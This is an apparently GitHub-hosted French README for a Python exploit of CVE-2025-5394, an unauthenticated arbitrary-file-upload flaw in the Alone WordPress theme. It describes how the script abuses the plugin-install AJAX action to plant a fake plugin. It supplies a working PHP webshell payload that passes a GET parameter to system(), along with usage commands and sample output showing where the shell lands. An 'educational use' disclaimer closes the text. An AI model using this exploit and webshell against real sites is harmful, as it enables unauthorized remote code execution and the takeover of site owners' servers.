
Alone – Thème WordPress caritatif multifonction sans but lucratif <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation
Alone – Thème WordPress caritatif polyvalent à but non lucratif Versions : <= 7.8.3 CVE : CVE-2025-5394 Score CVSS : 9.8 (Critique)
Le thème Alone pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison d'une vérification de capacité manquante dans la fonction alone_import_pack_install_plugin().
Cette faille permet à des attaquants non authentifiés de télécharger des fichiers ZIP (déguisés en plugins) depuis des emplacements distants, atteignant potentiellement une exécution de code à distance.
Ce dépôt contient un script Python qui automatise l'exploitation de CVE-2025-5394. Le script déclenche l'action AJAX vulnérable et télécharge un faux plugin (contenant un webshell) directement sur le serveur WordPress.
Le fichier ZIP téléchargé doit suivre cette structure :
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
Où :
shell_plugin est le répertoire du plugin.shell_plugin.php est un fichier PHP valide de plugin avec un en-tête de plugin.Exemple d'en-tête minimal de plugin dans shell_plugin.php :
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
Ce script est fourni à des fins éducatives et de recherche uniquement. L'auteur n'est pas responsable de toute utilisation abusive ou activité illégale menée à l'aide de ce code. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
Nxploited ( Khaled Alenazi ) GitHub : https://github.com/Nxploited